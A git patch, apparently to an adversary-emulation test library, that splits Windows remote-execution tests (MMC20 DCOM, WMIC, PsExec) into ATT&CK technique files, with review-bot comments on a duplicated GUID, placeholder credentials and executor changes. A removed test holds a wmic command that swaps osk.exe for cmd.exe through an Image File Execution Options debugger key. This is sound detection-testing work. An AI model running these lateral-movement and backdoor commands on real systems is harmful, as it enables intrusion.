From 6000965b1e25f57582fdb43093cfb400a1067a7c Mon Sep 17 00:00:00 2001
From: cnotin
Date: Fri, 18 Sep 2020 15:57:11 +0200
Subject: [PATCH] T1028 "Windows Remote Management": split in several techniques
Fixes #1042
---
atomics/T1021.003/T1021.003.yaml | 24 +++++++++
atomics/T1021.006/T1021.006.yaml | 85 --------------------------------
atomics/T1047/T1047.yaml | 12 ++++-
atomics/T1218.003/T1218.003.yaml | 20 ++++++++
atomics/T1569.002/T1569.002.yaml | 16 ++++-
5 files changed, 66 insertions(+), 91 deletions(-)
create mode 100644 atomics/T1021.003/T1021.003.yaml
diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml
new file mode 100644
index 0000000000..233c88eb37
--- /dev/null
+++ b/atomics/T1021.003/T1021.003.yaml
@@ -0,0 +1,24 @@
+attack_technique: T1021.003
+display_name: 'Remote Services: Distributed Component Object Model'
+atomic_tests:
+- name: PowerShell Lateral Movement using MMC20
+ auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
+ description: |
+ Powershell lateral movement using the mmc20 application com object.
+
+ Reference:
+
+ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
+
+ Upon successful execution, cmd will spawn calc.exe on a remote computer.
+ supported_platforms:
+ - windows
+ input_arguments:
+ computer_name:
+ description: Name of Computer
+ type: string
+ default: localhost
+ executor:
+ command: |
+ [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+ name: powershell
diff --git a/atomics/T1021.006/T1021.006.yaml b/atomics/T1021.006/T1021.006.yaml
index b487cf03c1..2a1b759226 100644
--- a/atomics/T1021.006/T1021.006.yaml
+++ b/atomics/T1021.006/T1021.006.yaml
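Review bot: `auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673` on this new test is reused verbatim by the test this same patch appends to atomics/T1218.003/T1218.003.yaml, so two tests in different techniques now share one GUID; the GUID is the stable identifier tooling uses to select and report a single test, and the two copies will be conflated. This copy is the natural owner (it is the GUID of the test removed from T1021.006), so the other copy should get a fresh GUID or be dropped. Separately, the executor is `powershell` while the description says `cmd will spawn calc.exe`; rewording to `Upon successful execution, powershell will spawn calc.exe on the remote computer via the MMC20.Application DCOM object.` keeps the description accurate.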
@@ -14,91 +14,6 @@ atomic_tests:
 Enable-PSRemoting -Force
 name: powershell
 elevation_required: true
-- name: PowerShell Lateral Movement
- auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
- description: |
- Powershell lateral movement using the mmc20 application com object.
-
- Reference:
-
- https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
-
- Upon successful execution, cmd will spawn calc.exe on a remote computer.
- supported_platforms:
- - windows
- input_arguments:
- computer_name:
- description: Name of Computer
- type: string
- default: localhost
- executor:
- command: |
- [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
- name: powershell
-- name: WMIC Process Call Create
- auto_generated_guid: 5cd59c3b-1375-4edf-9bac-5851c9915fca
- description: |
- Utilize WMIC to start remote process.
-
- Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe.
- supported_platforms:
- - windows
- input_arguments:
- user_name:
- description: Username
- type: String
- default: DOMAIN\Administrator
- password:
- description: Password
- type: String
- default: P@ssw0rd1
- computer_name:
- description: Target Computer Name
- type: String
- default: Target
- executor:
- command: |
- wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
- name: command_prompt
-- name: Psexec
- auto_generated_guid: 9bab84a1-08fd-4245-b681-e62c78283002
- description: |
- Utilize psexec to start remote process.
-
- Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system.
- supported_platforms:
- - windows
- input_arguments:
- user_name:
- description: Username
- type: String
- default: DOMAIN\Administrator
- psexec_exe:
- description: Path to PsExec
- type: string
- default: C:\PSTools\PsExec.exe
- password:
- description: Password
- type: String
- default: P@ssw0rd1
- computer_name:
- description: Target Computer Name
- type: String
- default: localhost
- dependencies:
- - description: |
- PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
- prereq_command: |
- if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
- get_prereq_command: |
- Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
- Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
- New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
- Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
- executor:
- command: |
- #{psexec_exe} \\#{computer_name} -accepteula -u #{user_name} -p #{password} -s cmd.exe
- name: command_prompt
 - name: Invoke-Command
 auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
 description: |
diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml
index 1c34b94348..735aea3b58 100644
--- a/atomics/T1047/T1047.yaml
+++ b/atomics/T1047/T1047.yaml
@@ -88,14 +88,22 @@ atomic_tests:
 description: Ip Address
 type: String
 default: 127.0.0.1
+ user_name:
+ description: Username
+ type: String
+ default: DOMAIN\Administrator
+ password:
+ description: Password
+ type: String
+ default: P@ssw0rd1
 process_to_execute:
 description: Name or path of process to execute.
 type: String
 default: notepad.exe
 executor:
 command: |
- wmic /node:"#{node}" process call create #{process_to_execute}
+ wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
 cleanup_command: |
- wmic /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
+ wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
 name: command_prompt
diff --git a/atomics/T1218.003/T1218.003.yaml b/atomics/T1218.003/T1218.003.yaml
index 211bd7727d..b1ad36a9ad 100644
--- a/atomics/T1218.003/T1218.003.yaml
+++ b/atomics/T1218.003/T1218.003.yaml
@@ -49,4 +49,24 @@ atomic_tests:
 command: |
 cmstp.exe /s #{inf_file_uac} /au
 name: command_prompt
+- name: PowerShell Lateral Movement
+ auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
+ description: |
+ Powershell lateral movement using the mmc20 application com object.
+
+ Reference:
+ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
+
+ Upon successful execution, cmd will spawn calc.exe on a remote computer.
+ supported_platforms:
+ - windows
+ input_arguments:
+ computer_name:
+ description: Name of Computer
+ type: string
+ default: localhost
+ executor:
+ command: |
+ [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+ name: powershell
diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml
index c2e2e154ee..a410b95c5e 100644
--- a/atomics/T1569.002/T1569.002.yaml
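Review bot: The executor and cleanup commands now unconditionally pass `/user:#{user_name} /password:#{password}`, but `node` still defaults to `127.0.0.1`; WMI refuses explicit credentials on a local connection, so a run with default arguments now fails where it previously ran under the caller's own token, and the placeholder defaults `DOMAIN\Administrator` / `P@ssw0rd1` can never be valid anyway. The test's name and description sit above this hunk (before line 88), so a note there is the place to state that `node` must be a remote host and that `user_name`/`password` must be overridden with credentials valid on it, e.g. `Requires a remote node and valid credentials: override node, user_name and password; the defaults are placeholders.` The same placeholder-credential defaults are added to atomics/T1569.002/T1569.002.yaml in this patch. Because the password travels on the wmic command line it will show up in command-line process-creation telemetry on the source host, which is worth stating so operators use a throwaway test account.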
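Review bot: The test appended to T1218.003 does not belong to this file's technique: the context lines show the existing tests invoking `cmstp.exe`, whereas the new test instantiates `MMC20.application` over DCOM, and it is a verbatim copy (same command, same `auto_generated_guid`) of the test this patch creates in atomics/T1021.003/T1021.003.yaml. Given the commit's stated aim of splitting T1028 into the right sub-techniques, the T1021.003 file looks like the intended home and this copy should be removed; if it is kept deliberately, it needs a unique GUID and a description that explains how an MMC20 DCOM call relates to CMSTP. The duplicated GUID also defeats any tooling that selects tests by GUID.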
+++ b/atomics/T1569.002/T1569.002.yaml
@@ -31,9 +31,9 @@ atomic_tests:
 auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c
 description: |
 Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments
- Will run a command on a remote host.
+ Will start a process on a remote host.
- Upon successful execution, powershell will download psexec.exe and spawn calc.exe on a remote endpoint (default:localhost).
+ Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost).
 supported_platforms:
 - windows
 input_arguments:
@@ -41,6 +41,14 @@ atomic_tests:
 description: Remote hostname or IP address
 type: string
 default: localhost
+ user_name:
+ description: Username
+ type: String
+ default: DOMAIN\Administrator
+ password:
+ description: Password
+ type: String
+ default: P@ssw0rd1
 psexec_exe:
 description: Path to PsExec
 type: string
@@ -57,5 +65,5 @@ atomic_tests:
 Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
 executor:
 command: |
- #{psexec_exe} \\#{remote_host} -accepteula "C:\Windows\System32\calc.exe"
- name: powershell
+ #{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe"
+ name: command_prompt
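Review bot: Changing the executor to `name: command_prompt` in the last hunk also changes how the dependency block is run: the `Copy-Item` context line at the top of that hunk (and the `Test-Path`/`Invoke-WebRequest` lines above it, outside the hunk) are PowerShell, and prerequisite commands run under the test's executor unless the test sets `dependency_executor_name`. If this test has no `dependency_executor_name: powershell` (the line would be outside this hunk), the prereq check and download will now be handed to cmd.exe and fail before the executor is reached; adding `dependency_executor_name: powershell` at test level, or keeping `name: powershell` (the previous command already ran fine there), avoids that. The credential-default problem noted on the T1047 hunk applies to the `user_name`/`password` arguments added in the second hunk here as well.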